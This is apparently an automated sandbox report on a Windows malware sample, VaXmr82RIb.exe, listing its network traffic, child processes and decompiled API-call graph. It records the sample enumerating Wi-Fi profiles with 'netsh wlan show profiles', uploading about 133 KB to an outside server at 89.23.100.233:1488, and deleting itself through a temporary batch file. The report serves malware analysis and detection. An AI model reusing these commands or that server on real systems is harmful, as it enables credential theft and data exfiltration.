                                                    Dec 4, 2024 14:44:40.184870005 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:41.560194016 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:41.568753004 CET14884974789.23.100.233192.168.11.20
                                                    Dec 4, 2024 14:44:41.568950891 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:41.569106102 CET497471488192.168.11.2089.23.100.233
                                                    Dec 4, 2024 14:44:41.830930948 CET14884974789.23.100.233192.168.11.20
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 4, 2024 14:44:32.340034962 CET5403453192.168.11.201.1.1.1
                                                    Dec 4, 2024 14:44:32.466788054 CET53540341.1.1.1192.168.11.20
                                                    Dec 4, 2024 14:44:32.785752058 CET6162953192.168.11.201.1.1.1
                                                    Dec 4, 2024 14:44:32.914283037 CET53616291.1.1.1192.168.11.20
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 4, 2024 14:44:32.340034962 CET192.168.11.201.1.1.10xf637Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                    Dec 4, 2024 14:44:32.785752058 CET192.168.11.201.1.1.10xd8f0Standard query (0)246.229.1.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 4, 2024 14:44:32.466788054 CET1.1.1.1192.168.11.200xf637No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                    Dec 4, 2024 14:44:32.466788054 CET1.1.1.1192.168.11.200xf637No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                    Dec 4, 2024 14:44:32.914283037 CET1.1.1.1192.168.11.200xd8f0Name error (3)246.229.1.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                    • icanhazip.com
                                                    • 89.23.100.233:1488
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.11.2049746104.16.184.241803364C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 4, 2024 14:44:32.610554934 CET63OUTGET / HTTP/1.1
                                                    Host: icanhazip.com
                                                    Connection: Keep-Alive
                                                    Dec 4, 2024 14:44:32.748589993 CET535INHTTP/1.1 200 OK
                                                    Date: Wed, 04 Dec 2024 13:44:32 GMT
                                                    Content-Type: text/plain
                                                    Content-Length: 13
                                                    Connection: keep-alive
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Methods: GET
                                                    Set-Cookie: __cf_bm=Mcc8vVSY0xxAvHSTAfbZ8u77HtOxbWZBEW6eLfDCJPE-1733319872-1.0.1.1-wOKlxe61Fyd3UVOH137kRR71AVyeDaN4GFoWwTyZfpBxxtMC8UHgjj.Pjac4YTgzB0pousTWxmsYJeGCnmu8Uw; path=/; expires=Wed, 04-Dec-24 14:14:32 GMT; domain=.icanhazip.com; HttpOnly
                                                    Server: cloudflare
                                                    CF-RAY: 8ecc3b543bc88e03-MIA
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 38 34 2e 31 37 2e 34 30 2e 31 31 30 0a
                                                    Data Ascii: 84.17.40.110


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.11.204974789.23.100.23314883364C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 4, 2024 14:44:38.861116886 CET205OUTPOST /upload HTTP/1.1
                                                    Content-Type: multipart/form-data; boundary="f093b59e-f0fc-499e-9213-ca04fdeb1c2d"
                                                    Host: 89.23.100.233:1488
                                                    Content-Length: 133518
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Dec 4, 2024 14:44:39.129076004 CET25INHTTP/1.1 100 Continue
                                                    Dec 4, 2024 14:44:39.393357992 CET25INHTTP/1.1 100 Continue
                                                    Dec 4, 2024 14:44:41.560194016 CET165INHTTP/1.1 200 OK
                                                    Server: Werkzeug/3.1.3 Python/3.13.0
                                                    Date: Wed, 04 Dec 2024 13:44:41 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 61
                                                    Connection: close


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:08:44:29
                                                    Start date:04/12/2024
                                                    Path:C:\Users\user\Desktop\VaXmr82RIb.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\VaXmr82RIb.exe"
                                                    Imagebase:0xff0000
                                                    File size:816'640 bytes
                                                    MD5 hash:3E11E285B883807EB038196EA1DE3CF8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:08:44:31
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"cmd.exe" /c tasklist
                                                    Imagebase:0x920000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:08:44:31
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                                                    Imagebase:0x920000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:08:44:31
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff791720000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:08:44:31
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff791720000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:08:44:31
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:tasklist
                                                    Imagebase:0xf40000
                                                    File size:79'360 bytes
                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:08:44:31
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\SysWOW64\chcp.com
                                                    Wow64 process (32bit):true
                                                    Commandline:chcp 65001
                                                    Imagebase:0xa20000
                                                    File size:12'800 bytes
                                                    MD5 hash:41146159AA3D41A92B53ED311EE15693
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:08:44:31
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\SysWOW64\netsh.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:netsh wlan show profiles
                                                    Imagebase:0x7ff7f1760000
                                                    File size:82'432 bytes
                                                    MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:08:44:31
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:findstr All
                                                    Imagebase:0xae0000
                                                    File size:29'696 bytes
                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:08:44:46
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat
                                                    Imagebase:0x920000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:08:44:46
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff791720000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:08:44:46
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\SysWOW64\chcp.com
                                                    Wow64 process (32bit):true
                                                    Commandline:chcp 65001
                                                    Imagebase:0xa20000
                                                    File size:12'800 bytes
                                                    MD5 hash:41146159AA3D41A92B53ED311EE15693
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:08:44:46
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\SysWOW64\taskkill.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:TaskKill /F /IM 3364
                                                    Imagebase:0x550000
                                                    File size:74'240 bytes
                                                    MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:08:44:46
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:Timeout /T 2 /Nobreak
                                                    Imagebase:0xf00000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:08:44:46
                                                    Start date:04/12/2024
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 3324
                                                    Imagebase:0xe50000
                                                    File size:482'640 bytes
                                                    MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:29%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:29.9%
                                                      Total number of Nodes:278
                                                      Total number of Limit Nodes:26
                                                      execution_graph 55419 3604d40 55420 3604d88 NtQueryVolumeInformationFile 55419->55420 55422 3604dc6 55420->55422 55423 33dd01c 55424 33dd034 55423->55424 55425 33dd085 55424->55425 55428 7855557 55424->55428 55433 7855558 55424->55433 55429 785557a 55428->55429 55438 78559b1 55429->55438 55443 78559c0 55429->55443 55430 785559b 55430->55430 55434 785557a 55433->55434 55436 78559b1 2 API calls 55434->55436 55437 78559c0 2 API calls 55434->55437 55435 785559b 55435->55435 55436->55435 55437->55435 55439 78559d4 55438->55439 55448 7857098 55439->55448 55453 78570a8 55439->55453 55440 78559e6 55440->55430 55444 78559d4 55443->55444 55446 7857098 2 API calls 55444->55446 55447 78570a8 2 API calls 55444->55447 55445 78559e6 55445->55430 55446->55445 55447->55445 55449 78570cd 55448->55449 55450 78571e3 55449->55450 55458 785b9e8 55449->55458 55463 785b9f8 55449->55463 55450->55440 55454 78570cd 55453->55454 55455 78571e3 55454->55455 55456 785b9e8 OleInitialize 55454->55456 55457 785b9f8 OleInitialize 55454->55457 55455->55440 55456->55455 55457->55455 55459 785ba25 OleInitialize 55458->55459 55461 785ba06 55458->55461 55462 785baa4 55459->55462 55461->55450 55462->55450 55464 785ba25 OleInitialize 55463->55464 55466 785ba06 55463->55466 55467 785baa4 55464->55467 55466->55450 55467->55450 55503 3604aa8 55504 3604af6 NtCreateSection 55503->55504 55506 3604b43 55504->55506 55511 3604e08 55512 3604e50 NtDeviceIoControlFile 55511->55512 55514 3604e9d 55512->55514 55515 3604688 55516 36046d3 NtAllocateVirtualMemory 55515->55516 55518 360471a 55516->55518 55468 36049d0 55469 3604a1e NtOpenFile 55468->55469 55471 3604a68 55469->55471 55472 3604c50 55473 3604c9b NtMapViewOfSection 55472->55473 55475 3604cfd 55473->55475 55507 36045b0 55508 36045fe NtProtectVirtualMemory 55507->55508 55510 3604648 55508->55510 55476 785adb0 55477 785adf6 55476->55477 55481 785af81 55477->55481 55486 785af90 55477->55486 55478 785aee3 55484 785afa2 55481->55484 55485 785afcd 55484->55485 55491 785a7fc 55484->55491 55485->55478 55489 785afa2 55486->55489 55487 785a7fc DuplicateHandle 55488 785b376 55487->55488 55488->55478 55489->55487 55490 785afcd 55489->55490 55490->55478 55492 785b4e8 DuplicateHandle 55491->55492 55493 785b376 55492->55493 55493->55478 55303 36040f8 55304 3604138 NtClose 55303->55304 55306 3604169 55304->55306 55307 7854c98 55308 7854cb3 55307->55308 55309 78551c1 55308->55309 55310 7854cff 55308->55310 55316 78557a0 55308->55316 55320 78557b0 55308->55320 55310->55309 55324 7b3c2b0 55310->55324 55333 7b3bb20 55310->55333 55347 7b3bb30 55310->55347 55317 78557ea 55316->55317 55360 78538b4 55317->55360 55321 78557ea 55320->55321 55322 78538b4 OleInitialize 55321->55322 55323 78557f3 55322->55323 55323->55308 55325 7b3c2d0 55324->55325 55326 7b3c2df 55324->55326 55325->55310 55329 7b3c325 55326->55329 55367 7b3c440 55326->55367 55327 7b3c347 55327->55310 55328 7b3c329 55328->55310 55329->55328 55372 7b3c458 55329->55372 55376 7b3c468 55329->55376 55334 7b3bae8 55333->55334 55335 7b3bb2f 55333->55335 55334->55310 55336 7b3bb7d 55335->55336 55337 7b3bd81 55335->55337 55339 7b3bd99 55335->55339 55336->55310 55342 7b3bb30 2 API calls 55337->55342 55343 7b3bb20 2 API calls 55337->55343 55388 7b3bcca 55337->55388 55338 7b3bd8f 55338->55310 55340 7b3bdcc 55339->55340 55401 7b3bdf8 55339->55401 55406 7b3bde9 55339->55406 55340->55310 55341 7b3bde1 55341->55310 55342->55338 55343->55338 55348 7b3bb51 55347->55348 55349 7b3bb7d 55348->55349 55350 7b3bd81 55348->55350 55352 7b3bd99 55348->55352 55349->55310 55357 7b3bb30 2 API calls 55350->55357 55358 7b3bb20 2 API calls 55350->55358 55359 7b3bcca 2 API calls 55350->55359 55351 7b3bd8f 55351->55310 55353 7b3bdcc 55352->55353 55355 7b3bde9 2 API calls 55352->55355 55356 7b3bdf8 2 API calls 55352->55356 55353->55310 55354 7b3bde1 55354->55310 55355->55354 55356->55354 55357->55351 55358->55351 55359->55351 55362 78538bf 55360->55362 55361 78557f3 55361->55308 55362->55361 55364 785a850 55362->55364 55365 785ba40 OleInitialize 55364->55365 55366 785baa4 55365->55366 55366->55361 55368 7b3c448 55367->55368 55370 78538b4 OleInitialize 55368->55370 55380 785b998 55368->55380 55369 7b3c451 55369->55329 55370->55369 55374 7b3c47d 55372->55374 55375 7b3c4a3 55374->55375 55384 7b3c088 55374->55384 55375->55327 55378 7b3c47d 55376->55378 55377 7b3c088 OleGetClipboard 55377->55378 55378->55377 55379 7b3c4a3 55378->55379 55379->55327 55381 785b9b3 55380->55381 55382 785b9c3 55381->55382 55383 785a850 OleInitialize 55381->55383 55382->55369 55383->55382 55385 7b3c510 OleGetClipboard 55384->55385 55387 7b3c5aa 55385->55387 55389 7b3bcec 55388->55389 55390 7b3bd1b 55389->55390 55391 7b3bd81 55389->55391 55394 7b3bd99 55389->55394 55390->55338 55396 7b3bb30 2 API calls 55391->55396 55397 7b3bb20 2 API calls 55391->55397 55398 7b3bcca 2 API calls 55391->55398 55392 7b3bd8f 55392->55338 55393 7b3bdcc 55393->55338 55394->55393 55399 7b3bde9 2 API calls 55394->55399 55400 7b3bdf8 2 API calls 55394->55400 55395 7b3bde1 55395->55338 55396->55392 55397->55392 55398->55392 55399->55395 55400->55395 55402 7b3be0a 55401->55402 55403 7b3be2b 55402->55403 55404 7b3c2b0 2 API calls 55402->55404 55411 7b3c2f8 55402->55411 55403->55341 55404->55403 55407 7b3be0a 55406->55407 55408 7b3be2b 55407->55408 55409 7b3c2b0 2 API calls 55407->55409 55410 7b3c2f8 2 API calls 55407->55410 55408->55341 55409->55408 55410->55408 55412 7b3c310 55411->55412 55417 7b3c325 55412->55417 55418 7b3c440 OleInitialize 55412->55418 55413 7b3c347 55413->55403 55414 7b3c329 55414->55403 55415 7b3c468 OleGetClipboard 55415->55413 55416 7b3c458 OleGetClipboard 55416->55413 55417->55414 55417->55415 55417->55416 55418->55417 55494 78512b8 55495 78512fe KiUserCallbackDispatcher 55494->55495 55497 7851351 55495->55497 55498 78510b8 55499 78510c4 55498->55499 55500 7851291 55499->55500 55501 785af81 DuplicateHandle 55499->55501 55502 785af90 DuplicateHandle 55499->55502 55501->55499 55502->55499 55519 80e1b70 55521 80e1b96 55519->55521 55520 80e1bf0 55521->55520 55524 80e1ca0 55521->55524 55531 80e1c91 55521->55531 55526 80e1cb3 55524->55526 55525 80e1e2d 55525->55520 55526->55525 55539 80e28e0 55526->55539 55562 80e2970 55526->55562 55585 80e8b8b 55526->55585 55597 80e8fd0 55526->55597 55532 80e1c58 55531->55532 55533 80e1c9f 55531->55533 55532->55520 55534 80e1e2d 55533->55534 55535 80e28e0 4 API calls 55533->55535 55536 80e2970 4 API calls 55533->55536 55537 80e8b8b 4 API calls 55533->55537 55538 80e8fd0 2 API calls 55533->55538 55534->55520 55535->55533 55536->55533 55537->55533 55538->55533 55541 80e28e5 55539->55541 55540 80e2954 55540->55526 55541->55540 55542 80e2b5d 55541->55542 55557 80e28e0 4 API calls 55541->55557 55558 80e2970 4 API calls 55541->55558 55543 80e2d30 55542->55543 55544 80e2d38 55542->55544 55548 80e28e0 4 API calls 55542->55548 55549 80e2970 4 API calls 55542->55549 55606 80e2ff0 55542->55606 55615 80e2f90 55542->55615 55543->55526 55545 80e2db4 55544->55545 55547 80e2f79 55544->55547 55559 80e28e0 4 API calls 55544->55559 55560 80e2970 4 API calls 55544->55560 55561 80e2f90 4 API calls 55544->55561 55545->55526 55546 80e2fde 55546->55526 55547->55546 55553 80e28e0 4 API calls 55547->55553 55554 80e2970 4 API calls 55547->55554 55555 80e2f90 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 55547->55555 55556 80e2ff0 4 API calls 55547->55556 55623 80e3c3a 55547->55623 55548->55542 55549->55542 55553->55547 55554->55547 55555->55547 55556->55547 55557->55541 55558->55541 55559->55544 55560->55544 55561->55544 55564 80e2976 55562->55564 55563 80e29e7 55563->55526 55564->55563 55565 80e2b5d 55564->55565 55572 80e28e0 4 API calls 55564->55572 55573 80e2970 4 API calls 55564->55573 55566 80e2d30 55565->55566 55567 80e2d38 55565->55567 55577 80e28e0 4 API calls 55565->55577 55578 80e2970 4 API calls 55565->55578 55579 80e2f90 4 API calls 55565->55579 55580 80e2ff0 4 API calls 55565->55580 55566->55526 55568 80e2db4 55567->55568 55570 80e2f79 55567->55570 55574 80e28e0 4 API calls 55567->55574 55575 80e2970 4 API calls 55567->55575 55576 80e2f90 4 API calls 55567->55576 55568->55526 55569 80e2f90 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 55569->55570 55570->55569 55571 80e2fde 55570->55571 55581 80e3c3a 4 API calls 55570->55581 55582 80e28e0 4 API calls 55570->55582 55583 80e2970 4 API calls 55570->55583 55584 80e2ff0 4 API calls 55570->55584 55571->55526 55572->55564 55573->55564 55574->55567 55575->55567 55576->55567 55577->55565 55578->55565 55579->55565 55580->55565 55581->55570 55582->55570 55583->55570 55584->55570 55586 80e8ba3 55585->55586 55594 80e8b8b 3 API calls 55586->55594 55596 80e8fd0 2 API calls 55586->55596 55628 80e91d8 55586->55628 55587 80e8ce3 55593 80e8f85 55587->55593 55634 80e85b4 55587->55634 55593->55526 55594->55587 55596->55587 55598 80e8f98 55597->55598 55599 80e8fdf 55597->55599 55598->55526 55600 80e85b4 LoadLibraryA 55599->55600 55601 80e905a 55599->55601 55603 80e91ec 55600->55603 55601->55526 55602 80e93cf LoadLibraryA 55604 80e940e 55602->55604 55603->55602 55603->55603 55605 80e925e 55603->55605 55605->55526 55607 80e3011 55606->55607 55608 80e3024 55606->55608 55607->55542 55609 80e3050 55608->55609 55610 80e3c3a 4 API calls 55608->55610 55611 80e28e0 4 API calls 55608->55611 55612 80e2970 4 API calls 55608->55612 55613 80e2f90 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 55608->55613 55614 80e2ff0 4 API calls 55608->55614 55609->55542 55610->55608 55611->55608 55612->55608 55613->55608 55614->55608 55617 80e2fa6 55615->55617 55616 80e2fde 55616->55542 55617->55616 55618 80e3c3a 4 API calls 55617->55618 55619 80e28e0 4 API calls 55617->55619 55620 80e2970 4 API calls 55617->55620 55621 80e2f90 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 55617->55621 55622 80e2ff0 4 API calls 55617->55622 55618->55617 55619->55617 55620->55617 55621->55617 55622->55617 55624 80e3c45 55623->55624 55625 80e3c58 55623->55625 55624->55547 55626 80e3d2e 55625->55626 55627 80e8b8b 4 API calls 55625->55627 55626->55547 55627->55625 55629 80e85b4 LoadLibraryA 55628->55629 55631 80e91ec 55628->55631 55629->55631 55630 80e93cf LoadLibraryA 55633 80e940e 55630->55633 55631->55630 55631->55631 55632 80e925e 55631->55632 55632->55587 55635 80e9328 LoadLibraryA 55634->55635 55637 80e940e 55635->55637
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !;A$":C$&H"g$)w=$*5C$1 a$33$4?3$8:5$=:-D
                                                      • API String ID: 0-336136860
                                                      • Opcode ID: 5f143397a984046e616da37dc7da363cb475ad5d3184ecb154145c5b219b8513
                                                      • Instruction ID: 9015a463ae6923f77ebb077797e7562e97617660ffa91b8c3784cf8e0a81df43
                                                      • Opcode Fuzzy Hash: 5f143397a984046e616da37dc7da363cb475ad5d3184ecb154145c5b219b8513
                                                      • Instruction Fuzzy Hash: 44E34D79F112199FCB94DF68D880A9DB3B7EB89210F1581EAD409EB350DB35AE81CF40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ojq$(ojq$Hnq$Hnq$Hnq$\sjq$pnq$pnq$;jq
                                                      • API String ID: 0-1547469935
                                                      • Opcode ID: 79ee424316a48a86a024003bbbec3205a1c5db8f3e67c6e7ada0495cec8039c3
                                                      • Instruction ID: ebb242ed8985325ab8934ac6f52a26336cfcfab676e277e1fcfa9f26900e5468
                                                      • Opcode Fuzzy Hash: 79ee424316a48a86a024003bbbec3205a1c5db8f3e67c6e7ada0495cec8039c3
                                                      • Instruction Fuzzy Hash: E3039A75B006198FCB14DF69D8C4A99B7B2BF98200F1981AAE909EF361DB31DD85CF44

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2257 89f0006-89f002b 2258 89f002c-89f003c 2257->2258 2258->2258 2259 89f003e-89f0059 2258->2259 2261 89f0060-89f007e 2259->2261 2264 89f0085-89f016f 2261->2264 2271 89f0537-89f0611 2264->2271 2272 89f0175-89f025b 2264->2272 2271->2261 2285 89f0617-89f06bd 2271->2285 2283 89f0262-89f041c 2272->2283 2283->2272 2310 89f0422-89f0531 2283->2310 2285->2271 2299 89f06c3-89f0843 2285->2299 2299->2261 2324 89f0849-89f0880 2299->2324 2310->2264 2310->2271 2327 89f0888-89f0891 call 360ee60 2324->2327 2328 89f0896-89f08bf 2327->2328 2328->2261 2331 89f08c5-89f0a7b 2328->2331 2331->2264 2344 89f0a81-89f0b42 2331->2344 2344->2261 2351 89f0b48-89f0c18 2344->2351 2351->2272 2358 89f0c1e-89f0ce3 2351->2358 2358->2272 2365 89f0ce9-89f0de4 2358->2365 2365->2272 2372 89f0dea-89f0eea 2365->2372 2372->2261 2379 89f0ef0-89f11d4 2372->2379 2379->2272 2398 89f11da-89f12bc 2379->2398 2405 89f12c6-89f130c call 360ee60 2398->2405 2406 89f1311-89f1560 2405->2406 2406->2283 2423 89f1566-89f164c 2406->2423 2423->2272 2430 89f1652-89f1759 2423->2430 2430->2261 2437 89f175f-89f181e 2430->2437 2444 89f1828-89f185e call 360ee60 2437->2444 2445 89f1863-89f1986 2444->2445 2445->2261 2456 89f198c-89f19ff 2445->2456 2459 89f1a0a-89f1a4c call 360ee60 2456->2459 2460 89f1a51-89f2004 2459->2460 2460->2261 2499 89f200a-89f216d 2460->2499 2508 89f2178-89f219f call 360ee60 2499->2508 2509 89f21a4-89f22e0 2508->2509 2509->2261 2518 89f22e6-89f23e6 2509->2518 2518->2283 2525 89f23ec-89f25e7 2518->2525 2540 89f25f2-89f263d call 360ee60 2525->2540 2541 89f2642-89f278b 2540->2541 2550 89f2795-89f27cd call 360ee60 2541->2550 2551 89f27d2-89f2a00 2550->2551 2551->2261 2568 89f2a06-89f2c10 2551->2568 2568->2261 2581 89f2c16-89f2d41 2568->2581 2590 89f2d4c-89f2d7b call 360ee60 2581->2590 2591 89f2d80-89f2eca 2590->2591 2591->2264 2600 89f2ed0-89f2fda 2591->2600 2600->2272 2607 89f2fe0-89f3289 2600->2607 2607->2272 2626 89f328f-89f32b1 2607->2626 2627 89f32bb-89f32d2 call 360ee60 2626->2627 2628 89f32d7-89f3379 2627->2628 2628->2264 2633 89f337f-89f34f8 2628->2633 2633->2261 2646 89f34fe-89f36ba 2633->2646 2646->2261 2659 89f36c0-89f37b0 2646->2659 2659->2272 2666 89f37b6-89f380a 2659->2666 2669 89f3815-89f3841 call 360ee60 2666->2669 2670 89f3846-89f3a0f 2669->2670 2681 89f3a1a-89f3a4c call 360ee60 2670->2681 2682 89f3a51-89f3ba3 2681->2682 2682->2283 2691 89f3ba9-89f3c5c 2682->2691 2691->2272 2698 89f3c62-89f3d58 2691->2698 2698->2261 2705 89f3d5e-89f42fd 2698->2705 2705->2272 2742 89f4303-89f43e1 2705->2742 2742->2283 2749 89f43e7-89f44d6 2742->2749 2749->2261 2756 89f44dc-89f45ae 2749->2756 2756->2283 2763 89f45b4-89f4699 2756->2763 2763->2261 2770 89f469f-89f4782 2763->2770 2770->2283 2777 89f4788-89f4adf 2770->2777 2777->2283 2802 89f4ae5-89f4aee 2777->2802 2803 89f4af8-89f4b40 call 360ee60 2802->2803 2804 89f4b45-89f4d7b 2803->2804 2804->2264 2821 89f4d81-89f4d99 2804->2821 2821->2264 2823 89f4d9f-89f4da4 2821->2823
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: p6c$9/'_$=#$?"1$}+=
                                                      • API String ID: 0-3954522359
                                                      • Opcode ID: d776c5f0073ac75f692ab9d8fa4cb0eab9ed305affdaa3e83ab6fff35d61c986
                                                      • Instruction ID: 3fca1263118b51e891824e2bdc26bb514034b8cd57ca9a2bac08d01535c83db6
                                                      • Opcode Fuzzy Hash: d776c5f0073ac75f692ab9d8fa4cb0eab9ed305affdaa3e83ab6fff35d61c986
                                                      • Instruction Fuzzy Hash: 2FA3CBB4E0061C9FCB58DFA8C891A9EBBB2EF84314F2085E9D549A7354DB359E81CF44

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
